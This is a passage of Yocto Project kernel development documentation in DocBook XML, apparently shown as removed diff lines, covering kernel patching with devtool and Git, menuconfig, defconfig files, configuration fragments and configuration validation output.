- By default, the OpenEmbedded build system looks for
- <filename>defconfig</filename> files in the layer used for
- Metadata, which is "out-of-tree", and then configures them
- using the following:
- <literallayout class='monospaced'>
- SRC_URI += "file://defconfig"
- </literallayout>
- If you do not want to maintain copies of
- <filename>defconfig</filename> files in your layer but would
- rather allow users to use the default configuration from the
- kernel tree and still be able to add configuration fragments
- to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- through, for example, append files, you can direct the
- OpenEmbedded build system to use a
- <filename>defconfig</filename> file that is "in-tree".
- </para>
-
- <para>
- To specify an "in-tree" <filename>defconfig</filename> file,
- use the following statement form:
- <literallayout class='monospaced'>
- KBUILD_DEFCONFIG_<replaceable>KMACHINE</replaceable> ?= <replaceable>defconfig_file</replaceable>
- </literallayout>
- Here is an example that assigns the
- <filename>KBUILD_DEFCONFIG</filename> variable based on
- "raspberrypi2" and provides the path to the "in-tree"
- <filename>defconfig</filename> file
- to be used for a Raspberry Pi 2,
- which is based on the Broadcom 2708/2709 chipset:
- <literallayout class='monospaced'>
- KBUILD_DEFCONFIG_raspberrypi2 ?= "bcm2709_defconfig"
- </literallayout>
- </para>
-
- <para>
- Aside from modifying your kernel recipe and providing your own
- <filename>defconfig</filename> file, you need to be sure no
- files or statements set <filename>SRC_URI</filename> to use a
- <filename>defconfig</filename> other than your "in-tree"
- file (e.g. a kernel's
- <filename>linux-</filename><replaceable>machine</replaceable><filename>.inc</filename>
- file).
- In other words, if the build system detects a statement
- that identifies an "out-of-tree"
- <filename>defconfig</filename> file, that statement
- will override your
- <filename>KBUILD_DEFCONFIG</filename> variable.
- </para>
-
- <para>
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KBUILD_DEFCONFIG'><filename>KBUILD_DEFCONFIG</filename></ulink>
- variable description for more information.
- </para>
- </section>
- </section>
-
- <section id="using-devtool-to-patch-the-kernel">
- <title>Using <filename>devtool</filename> to Patch the Kernel</title>
-
- <para>
- The steps in this procedure show you how you can patch the
- kernel using the extensible SDK and <filename>devtool</filename>.
- <note>
- Before attempting this procedure, be sure you have performed
- the steps to get ready for updating the kernel as described
- in the
- "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
- section.
- </note>
- </para>
-
- <para>
- Patching the kernel involves changing or adding configurations
- to an existing kernel, changing or adding recipes to the kernel
- that are needed to support specific hardware features, or even
- altering the source code itself.
- </para>
-
- <para>
- This example creates a simple patch by adding some QEMU emulator
- console output at boot time through <filename>printk</filename>
- statements in the kernel's <filename>calibrate.c</filename> source
- code file.
- Applying the patch and booting the modified image causes the added
- messages to appear on the emulator's console.
- The example is a continuation of the setup procedure found in
- the
- "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
- Section.
- <orderedlist>
- <listitem><para>
- <emphasis>Check Out the Kernel Source Files:</emphasis>
- First you must use <filename>devtool</filename> to checkout
- the kernel source code in its workspace.
- Be sure you are in the terminal set up to do work
- with the extensible SDK.
- <note>
- See this
- <link linkend='setting-up-the-esdk-terminal'>step</link>
- in the
- "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
- section for more information.
- </note>
- Use the following <filename>devtool</filename> command
- to check out the code:
- <literallayout class='monospaced'>
- $ devtool modify linux-yocto
- </literallayout>
- <note>
- During the checkout operation, a bug exists that could
- cause errors such as the following to appear:
- <literallayout class='monospaced'>
- ERROR: Taskhash mismatch 2c793438c2d9f8c3681fd5f7bc819efa versus
- be3a89ce7c47178880ba7bf6293d7404 for
- /path/to/esdk/layers/poky/meta/recipes-kernel/linux/linux-yocto_4.10.bb.do_unpack
- </literallayout>
- You can safely ignore these messages.
- The source code is correctly checked out.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the Source Files</emphasis>
- Follow these steps to make some simple changes to the source
- files:
- <orderedlist>
- <listitem><para>
- <emphasis>Change the working directory</emphasis>:
- In the previous step, the output noted where you can find
- the source files (e.g.
- <filename>~/poky_sdk/workspace/sources/linux-yocto</filename>).
- Change to where the kernel source code is before making
- your edits to the <filename>calibrate.c</filename> file:
- <literallayout class='monospaced'>
- $ cd ~/poky_sdk/workspace/sources/linux-yocto
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the source file</emphasis>:
- Edit the <filename>init/calibrate.c</filename> file to have
- the following changes:
- <literallayout class='monospaced'>
- void calibrate_delay(void)
- {
- unsigned long lpj;
- static bool printed;
- int this_cpu = smp_processor_id();
-
- printk("*************************************\n");
- printk("* *\n");
- printk("* HELLO YOCTO KERNEL *\n");
- printk("* *\n");
- printk("*************************************\n");
-
- if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
- .
- .
- .
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Updated Kernel Source:</emphasis>
- To build the updated kernel source, use
- <filename>devtool</filename>:
- <literallayout class='monospaced'>
- $ devtool build linux-yocto
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create the Image With the New Kernel:</emphasis>
- Use the <filename>devtool build-image</filename> command
- to create a new image that has the new kernel.
- <note>
- If the image you originally created resulted in a Wic
- file, you can use an alternate method to create the new
- image with the updated kernel.
- For an example, see the steps in the
- <ulink url='https://wiki.yoctoproject.org/wiki/TipsAndTricks/KernelDevelopmentWithEsdk'>TipsAndTricks/KernelDevelopmentWithEsdk</ulink>
- Wiki Page.
- </note>
- <literallayout class='monospaced'>
- $ cd ~
- $ devtool build-image core-image-minimal
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Test the New Image:</emphasis>
- For this example, you can run the new image using QEMU
- to verify your changes:
- <orderedlist>
- <listitem><para>
- <emphasis>Boot the image</emphasis>:
- Boot the modified image in the QEMU emulator
- using this command:
- <literallayout class='monospaced'>
- $ runqemu qemux86
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Verify the changes</emphasis>:
- Log into the machine using <filename>root</filename>
- with no password and then use the following shell
- command to scroll through the console's boot output.
- <literallayout class='monospaced'>
- # dmesg | less
- </literallayout>
- You should see the results of your
- <filename>printk</filename> statements
- as part of the output when you scroll down the
- console window.
- </para></listitem>
- </orderedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Stage and commit your changes</emphasis>:
- Within your eSDK terminal, change your working directory to
- where you modified the <filename>calibrate.c</filename>
- file and use these Git commands to stage and commit your
- changes:
- <literallayout class='monospaced'>
- $ cd ~/poky_sdk/workspace/sources/linux-yocto
- $ git status
- $ git add init/calibrate.c
- $ git commit -m "calibrate: Add printk example"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Export the Patches and Create an Append File:</emphasis>
- To export your commits as patches and create a
- <filename>.bbappend</filename> file, use the following
- command in the terminal used to work with the extensible
- SDK.
- This example uses the previously established layer named
- <filename>meta-mylayer</filename>.
- <note>
- See Step 3 of the
- "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using devtool</link>"
- section for information on setting up this layer.
- </note>
- <literallayout class='monospaced'>
- $ devtool finish linux-yocto ~/meta-mylayer
- </literallayout>
- Once the command finishes, the patches and the
- <filename>.bbappend</filename> file are located in the
- <filename>~/meta-mylayer/recipes-kernel/linux</filename>
- directory.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Image With Your Modified Kernel:</emphasis>
- You can now build an image that includes your kernel
- patches.
- Execute the following command from your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- in the terminal set up to run BitBake:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake core-image-minimal
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id="using-traditional-kernel-development-to-patch-the-kernel">
- <title>Using Traditional Kernel Development to Patch the Kernel</title>
-
- <para>
- The steps in this procedure show you how you can patch the
- kernel using traditional kernel development (i.e. not using
- <filename>devtool</filename> and the extensible SDK as
- described in the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- section).
- <note>
- Before attempting this procedure, be sure you have performed
- the steps to get ready for updating the kernel as described
- in the
- "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
- section.
- </note>
- </para>
-
- <para>
- Patching the kernel involves changing or adding configurations
- to an existing kernel, changing or adding recipes to the kernel
- that are needed to support specific hardware features, or even
- altering the source code itself.
- </para>
-
- <para>
- The example in this section creates a simple patch by adding some
- QEMU emulator console output at boot time through
- <filename>printk</filename> statements in the kernel's
- <filename>calibrate.c</filename> source code file.
- Applying the patch and booting the modified image causes the added
- messages to appear on the emulator's console.
- The example is a continuation of the setup procedure found in
- the
- "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
- Section.
- <orderedlist>
- <listitem><para>
- <emphasis>Edit the Source Files</emphasis>
- Prior to this step, you should have used Git to create a
- local copy of the repository for your kernel.
- Assuming you created the repository as directed in the
- "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
- section, use the following commands to edit the
- <filename>calibrate.c</filename> file:
- <orderedlist>
- <listitem><para>
- <emphasis>Change the working directory</emphasis>:
- You need to locate the source files in the
- local copy of the kernel Git repository:
- Change to where the kernel source code is before making
- your edits to the <filename>calibrate.c</filename> file:
- <literallayout class='monospaced'>
- $ cd ~/linux-yocto-4.12/init
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the source file</emphasis>:
- Edit the <filename>calibrate.c</filename> file to have
- the following changes:
- <literallayout class='monospaced'>
- void calibrate_delay(void)
- {
- unsigned long lpj;
- static bool printed;
- int this_cpu = smp_processor_id();
-
- printk("*************************************\n");
- printk("* *\n");
- printk("* HELLO YOCTO KERNEL *\n");
- printk("* *\n");
- printk("*************************************\n");
-
- if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
- .
- .
- .
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Stage and Commit Your Changes:</emphasis>
- Use standard Git commands to stage and commit the changes
- you just made:
- <literallayout class='monospaced'>
- $ git add calibrate.c
- $ git commit -m "calibrate.c - Added some printk statements"
- </literallayout>
- If you do not stage and commit your changes, the OpenEmbedded
- Build System will not pick up the changes.
- </para></listitem>
- <listitem><para>
- <emphasis>Update Your <filename>local.conf</filename> File
- to Point to Your Source Files:</emphasis>
- In addition to your <filename>local.conf</filename> file
- specifying to use "kernel-modules" and the "qemux86"
- machine, it must also point to the updated kernel source
- files.
- Add
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- statements similar to the following to your
- <filename>local.conf</filename>:
- <literallayout class='monospaced'>
- $ cd ~/poky/build/conf
- </literallayout>
- Add the following to the <filename>local.conf</filename>:
- <literallayout class='monospaced'>
- SRC_URI_pn-linux-yocto = "git:///<replaceable>path-to</replaceable>/linux-yocto-4.12;protocol=file;name=machine;branch=standard/base; \
- git:///<replaceable>path-to</replaceable>/yocto-kernel-cache;protocol=file;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
- SRCREV_meta_qemux86 = "${AUTOREV}"
- SRCREV_machine_qemux86 = "${AUTOREV}"
- </literallayout>
- <note>
- Be sure to replace
- <replaceable>path-to</replaceable> with the pathname
- to your local Git repositories.
- Also, you must be sure to specify the correct branch
- and machine types.
- For this example, the branch is
- <filename>standard/base</filename> and the machine is
- "qemux86".
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Image:</emphasis>
- With the source modified, your changes staged and
- committed, and the <filename>local.conf</filename> file
- pointing to the kernel files, you can now use BitBake to
- build the image:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake core-image-minimal
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Boot the image</emphasis>:
- Boot the modified image in the QEMU emulator
- using this command.
- When prompted to login to the QEMU console, use "root"
- with no password:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ runqemu qemux86
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Look for Your Changes:</emphasis>
- As QEMU booted, you might have seen your changes rapidly
- scroll by.
- If not, use these commands to see your changes:
- <literallayout class='monospaced'>
- # dmesg | less
- </literallayout>
- You should see the results of your
- <filename>printk</filename> statements
- as part of the output when you scroll down the
- console window.
- </para></listitem>
- <listitem><para>
- <emphasis>Generate the Patch File:</emphasis>
- Once you are sure that your patch works correctly, you
- can generate a <filename>*.patch</filename> file in the
- kernel source repository:
- <literallayout class='monospaced'>
- $ cd ~/linux-yocto-4.12/init
- $ git format-patch -1
- 0001-calibrate.c-Added-some-printk-statements.patch
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Move the Patch File to Your Layer:</emphasis>
- In order for subsequent builds to pick up patches, you
- need to move the patch file you created in the previous
- step to your layer <filename>meta-mylayer</filename>.
- For this example, the layer created earlier is located
- in your home directory as <filename>meta-mylayer</filename>.
- When the layer was created using the
- <filename>yocto-create</filename> script, no additional
- hierarchy was created to support patches.
- Before moving the patch file, you need to add additional
- structure to your layer using the following commands:
- <literallayout class='monospaced'>
- $ cd ~/meta-mylayer
- $ mkdir recipes-kernel
- $ mkdir recipes-kernel/linux
- $ mkdir recipes-kernel/linux/linux-yocto
- </literallayout>
- Once you have created this hierarchy in your layer, you can
- move the patch file using the following command:
- <literallayout class='monospaced'>
- $ mv ~/linux-yocto-4.12/init/0001-calibrate.c-Added-some-printk-statements.patch ~/meta-mylayer/recipes-kernel/linux/linux-yocto
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create the Append File:</emphasis>
- Finally, you need to create the
- <filename>linux-yocto_4.12.bbappend</filename> file and
- insert statements that allow the OpenEmbedded build
- system to find the patch.
- The append file needs to be in your layer's
- <filename>recipes-kernel/linux</filename>
- directory and it must be named
- <filename>linux-yocto_4.12.bbappend</filename> and have
- the following contents:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-
- SRC_URI_append = " file://0001-calibrate.c-Added-some-printk-statements.patch"
- </literallayout>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statements enable the OpenEmbedded build system to find
- the patch file.</para>
-
- <para>For more information on append files and patches,
- see the
- "<link linkend='creating-the-append-file'>Creating the Append File</link>"
- and
- "<link linkend='applying-patches'>Applying Patches</link>"
- sections.
- You can also see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer"</ulink>"
- section in the Yocto Project Development Tasks Manual.
- <note>
- To build <filename>core-image-minimal</filename>
- again and see the effects of your patch, you can
- essentially eliminate the temporary source files
- saved in <filename>poky/build/tmp/work/...</filename>
- and residual effects of the build by entering the
- following sequence of commands:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake -c cleanall yocto-linux
- $ bitbake core-image-minimal -c cleanall
- $ bitbake core-image-minimal
- $ runqemu qemux86
- </literallayout>
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='configuring-the-kernel'>
- <title>Configuring the Kernel</title>
-
- <para>
- Configuring the Yocto Project kernel consists of making sure the
- <filename>.config</filename> file has all the right information
- in it for the image you are building.
- You can use the <filename>menuconfig</filename> tool and
- configuration fragments to make sure your
- <filename>.config</filename> file is just how you need it.
- You can also save known configurations in a
- <filename>defconfig</filename> file that the build system can use
- for kernel configuration.
- </para>
-
- <para>
- This section describes how to use <filename>menuconfig</filename>,
- create and use configuration fragments, and how to interactively
- modify your <filename>.config</filename> file to create the
- leanest kernel configuration file possible.
- </para>
-
- <para>
- For more information on kernel configuration, see the
- "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
- section.
- </para>
-
- <section id='using-menuconfig'>
- <title>Using&nbsp;&nbsp;<filename>menuconfig</filename></title>
-
- <para>
- The easiest way to define kernel configurations is to set
- them through the <filename>menuconfig</filename> tool.
- This tool provides an interactive method with which
- to set kernel configurations.
- For general information on <filename>menuconfig</filename>, see
- <ulink url='http://en.wikipedia.org/wiki/Menuconfig'></ulink>.
- </para>
-
- <para>
- To use the <filename>menuconfig</filename> tool in the Yocto
- Project development environment, you must do the following:
- <itemizedlist>
- <listitem><para>
- Because you launch <filename>menuconfig</filename>
- using BitBake, you must be sure to set up your
- environment by running the
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- script found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- </para></listitem>
- <listitem><para>
- You must be sure of the state of your build's
- configuration in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- </para></listitem>
- <listitem><para>
- Your build host must have the following two packages
- installed:
- <literallayout class='monospaced'>
- libncurses5-dev
- libtinfo-dev
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The following commands initialize the BitBake environment,
- run the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></ulink>
- task, and launch <filename>menuconfig</filename>.
- These commands assume the Source Directory's top-level folder
- is <filename>~/poky</filename>:
- <literallayout class='monospaced'>
- $ cd poky
- $ source oe-init-build-env
- $ bitbake linux-yocto -c kernel_configme -f
- $ bitbake linux-yocto -c menuconfig
- </literallayout>
- Once <filename>menuconfig</filename> comes up, its standard
- interface allows you to interactively examine and configure
- all the kernel configuration parameters.
- After making your changes, simply exit the tool and save your
- changes to create an updated version of the
- <filename>.config</filename> configuration file.
- <note>
- You can use the entire <filename>.config</filename> file
- as the <filename>defconfig</filename> file.
- For information on <filename>defconfig</filename> files,
- see the
- "<link linkend='changing-the-configuration'>Changing the Configuration</link>",
- "<link linkend='using-an-in-tree-defconfig-file'>Using an In-Tree <filename>defconfig</filename> File</link>,
- and
- "<link linkend='creating-a-defconfig-file'>Creating a <filename>defconfig</filename> File</link>"
- sections.
- </note>
- </para>
-
- <para>
- Consider an example that configures the "CONFIG_SMP" setting
- for the <filename>linux-yocto-4.12</filename> kernel.
- <note>
- The OpenEmbedded build system recognizes this kernel as
- <filename>linux-yocto</filename> through Metadata (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></ulink><filename>_linux-yocto ?= "12.4%"</filename>).
- </note>
- Once <filename>menuconfig</filename> launches, use the
- interface to navigate through the selections to find the
- configuration settings in which you are interested.
- For this example, you deselect "CONFIG_SMP" by clearing the
- "Symmetric Multi-Processing Support" option.
- Using the interface, you can find the option under
- "Processor Type and Features".
- To deselect "CONFIG_SMP", use the arrow keys to
- highlight "Symmetric Multi-Processing Support" and enter "N"
- to clear the asterisk.
- When you are finished, exit out and save the change.
- </para>
-
- <para>
- Saving the selections updates the <filename>.config</filename>
- configuration file.
- This is the file that the OpenEmbedded build system uses to
- configure the kernel during the build.
- You can find and examine this file in the Build Directory in
- <filename>tmp/work/</filename>.
- The actual <filename>.config</filename> is located in the
- area where the specific kernel is built.
- For example, if you were building a Linux Yocto kernel based
- on the <filename>linux-yocto-4.12</filename> kernel and you
- were building a QEMU image targeted for
- <filename>x86</filename> architecture, the
- <filename>.config</filename> file would be:
- <literallayout class='monospaced'>
- poky/build/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+gitAUTOINC+eda4d18...
- ...967-r0/linux-qemux86-standard-build/.config
- </literallayout>
- <note>
- The previous example directory is artificially split and
- many of the characters in the actual filename are omitted
- in order to make it more readable.
- Also, depending on the kernel you are using, the exact
- pathname might differ.
- </note>
- </para>
-
- <para>
- Within the <filename>.config</filename> file, you can see the
- kernel settings.
- For example, the following entry shows that symmetric
- multi-processor support is not set:
- <literallayout class='monospaced'>
- # CONFIG_SMP is not set
- </literallayout>
- </para>
-
- <para>
- A good method to isolate changed configurations is to use a
- combination of the <filename>menuconfig</filename> tool and
- simple shell commands.
- Before changing configurations with
- <filename>menuconfig</filename>, copy the existing
- <filename>.config</filename> and rename it to something else,
- use <filename>menuconfig</filename> to make as many changes as
- you want and save them, then compare the renamed configuration
- file against the newly created file.
- You can use the resulting differences as your base to create
- configuration fragments to permanently save in your kernel
- layer.
- <note>
- Be sure to make a copy of the <filename>.config</filename>
- file and do not just rename it.
- The build system needs an existing
- <filename>.config</filename> file from which to work.
- </note>
- </para>
- </section>
-
- <section id='creating-a-defconfig-file'>
- <title>Creating a&nbsp;&nbsp;<filename>defconfig</filename> File</title>
-
- <para>
- A <filename>defconfig</filename> file in the context of
- the Yocto Project is often a <filename>.config</filename>
- file that is copied from a build or a
- <filename>defconfig</filename> taken from the kernel tree
- and moved into recipe space.
- You can use a <filename>defconfig</filename> file
- to retain a known set of kernel configurations from which the
- OpenEmbedded build system can draw to create the final
- <filename>.config</filename> file.
- <note>
- Out-of-the-box, the Yocto Project never ships a
- <filename>defconfig</filename> or
- <filename>.config</filename> file.
- The OpenEmbedded build system creates the final
- <filename>.config</filename> file used to configure the
- kernel.
- </note>
- </para>
-
- <para>
- To create a <filename>defconfig</filename>, start with a
- complete, working Linux kernel <filename>.config</filename>
- file.
- Copy that file to the appropriate
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
- directory in your layer's
- <filename>recipes-kernel/linux</filename> directory, and rename
- the copied file to "defconfig" (e.g.
- <filename>~/meta-mylayer/recipes-kernel/linux/linux-yocto/defconfig</filename>).
- Then, add the following lines to the linux-yocto
- <filename>.bbappend</filename> file in your layer:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- SRC_URI += "file://defconfig"
- </literallayout>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- tells the build system how to search for the file, while the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- extends the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- variable (search directories) to include the
- <filename>${PN}</filename> directory you created to hold the
- configuration changes.
- <note>
- The build system applies the configurations from the
- <filename>defconfig</filename> file before applying any
- subsequent configuration fragments.
- The final kernel configuration is a combination of the
- configurations in the <filename>defconfig</filename>
- file and any configuration fragments you provide.
- You need to realize that if you have any configuration
- fragments, the build system applies these on top of and
- after applying the existing defconfig file configurations.
- </note>
- For more information on configuring the kernel, see the
- "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
- section.
- </para>
- </section>
-
- <section id='creating-config-fragments'>
- <title>Creating Configuration Fragments</title>
-
- <para>
- Configuration fragments are simply kernel options that
- appear in a file placed where the OpenEmbedded build system
- can find and apply them.
- The build system applies configuration fragments after
- applying configurations from a <filename>defconfig</filename>
- file.
- Thus, the final kernel configuration is a combination of the
- configurations in the <filename>defconfig</filename>
- file and then any configuration fragments you provide.
- The build system applies fragments on top of and
- after applying the existing defconfig file configurations.
- </para>
-
- <para>
- Syntactically, the configuration statement is identical to
- what would appear in the <filename>.config</filename> file,
- which is in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- <note>
- For more information about where the
- <filename>.config</filename> file is located, see the
- example in the
- "<link linkend='using-menuconfig'>Using <filename>menuconfig</filename></link>"
- section.
- </note>
- </para>
-
- <para>
- It is simple to create a configuration fragment.
- One method is to use shell commands.
- For example, issuing the following from the shell creates a
- configuration fragment file named
- <filename>my_smp.cfg</filename> that enables multi-processor
- support within the kernel:
- <literallayout class='monospaced'>
- $ echo "CONFIG_SMP=y" >> my_smp.cfg
- </literallayout>
- <note>
- All configuration fragment files must use the
- <filename>.cfg</filename> extension in order for the
- OpenEmbedded build system to recognize them as a
- configuration fragment.
- </note>
- </para>
-
- <para>
- Another method is to create a configuration fragment using the
- differences between two configuration files: one previously
- created and saved, and one freshly created using the
- <filename>menuconfig</filename> tool.
- </para>
-
- <para>
- To create a configuration fragment using this method, follow
- these steps:
- <orderedlist>
- <listitem><para>
- <emphasis>Complete a Build Through Kernel Configuration:</emphasis>
- Complete a build at least through the kernel
- configuration task as follows:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c kernel_configme -f
- </literallayout>
- This step ensures that you create a
- <filename>.config</filename> file from a known state.
- Because situations exist where your build state might
- become unknown, it is best to run this task prior
- to starting <filename>menuconfig</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis>Launch <filename>menuconfig</filename>:</emphasis>
- Run the <filename>menuconfig</filename> command:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c menuconfig
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create the Configuration Fragment:</emphasis>
- Run the <filename>diffconfig</filename>
- command to prepare a configuration fragment.
- The resulting file <filename>fragment.cfg</filename>
- is placed in the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename> directory:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c diffconfig
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- The <filename>diffconfig</filename> command creates a file
- that is a list of Linux kernel <filename>CONFIG_</filename>
- assignments.
- See the "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
- section for additional information on how to use the output
- as a configuration fragment.
- <note>
- You can also use this method to create configuration
- fragments for a BSP.
- See the "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
- section for more information.
- </note>
- </para>
-
- <para>
- Where do you put your configuration fragment files?
- You can place these files in an area pointed to by
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- as directed by your <filename>bblayers.conf</filename> file,
- which is located in your layer.
- The OpenEmbedded build system picks up the configuration and
- adds it to the kernel's configuration.
- For example, suppose you had a set of configuration options
- in a file called <filename>myconfig.cfg</filename>.
- If you put that file inside a directory named
- <filename>linux-yocto</filename> that resides in the same
- directory as the kernel's append file within your layer
- and then add the following statements to the kernel's append
- file, those configuration options will be picked up and applied
- when the kernel is built:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- SRC_URI += "file://myconfig.cfg"
- </literallayout>
- </para>
-
- <para>
- As mentioned earlier, you can group related configurations
- into multiple files and name them all in the
- <filename>SRC_URI</filename> statement as well.
- For example, you could group separate configurations
- specifically for Ethernet and graphics into their own files
- and add those by using a <filename>SRC_URI</filename> statement
- like the following in your append file:
- <literallayout class='monospaced'>
- SRC_URI += "file://myconfig.cfg \
- file://eth.cfg \
- file://gfx.cfg"
- </literallayout>
- </para>
- </section>
-
- <section id='validating-configuration'>
- <title>Validating Configuration</title>
-
- <para>
- You can use the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configcheck'><filename>do_kernel_configcheck</filename></ulink>
- task to provide configuration validation:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c kernel_configcheck -f
- </literallayout>
- Running this task produces warnings for when a
- requested configuration does not appear in the final
- <filename>.config</filename> file or when you override a
- policy configuration in a hardware configuration fragment.
- </para>
-
- <para>
- In order to run this task, you must have an existing
- <filename>.config</filename> file.
- See the
- "<link linkend='using-menuconfig'>Using <filename>menuconfig</filename></link>"
- section for information on how to create a configuration file.
- </para>
-
- <para>
- Following is sample output from the
- <filename>do_kernel_configcheck</filename> task:
- <literallayout class='monospaced'>
- Loading cache: 100% |########################################################| Time: 0:00:00
- Loaded 1275 entries from dependency cache.
- NOTE: Resolving any missing task queue dependencies
-
- Build Configuration:
- .
- .
- .
-
- NOTE: Executing SetScene Tasks
- NOTE: Executing RunQueue Tasks
- WARNING: linux-yocto-4.12.12+gitAUTOINC+eda4d18ce4_16de014967-r0 do_kernel_configcheck:
- [kernel config]: specified values did not make it into the kernel's final configuration:
-
- ---------- CONFIG_X86_TSC -----------------
- Config: CONFIG_X86_TSC
- From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc-cpu.cfg
- Requested value: CONFIG_X86_TSC=y
- Actual value:
-
-
- ---------- CONFIG_X86_BIGSMP -----------------
- Config: CONFIG_X86_BIGSMP
- From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
- /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
- Requested value: # CONFIG_X86_BIGSMP is not set
- Actual value:
-
-
- ---------- CONFIG_NR_CPUS -----------------
- Config: CONFIG_NR_CPUS
- From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
- /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc.cfg
- /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
- Requested value: CONFIG_NR_CPUS=8
- Actual value: CONFIG_NR_CPUS=1
-
-
- ---------- CONFIG_SCHED_SMT -----------------
- Config: CONFIG_SCHED_SMT
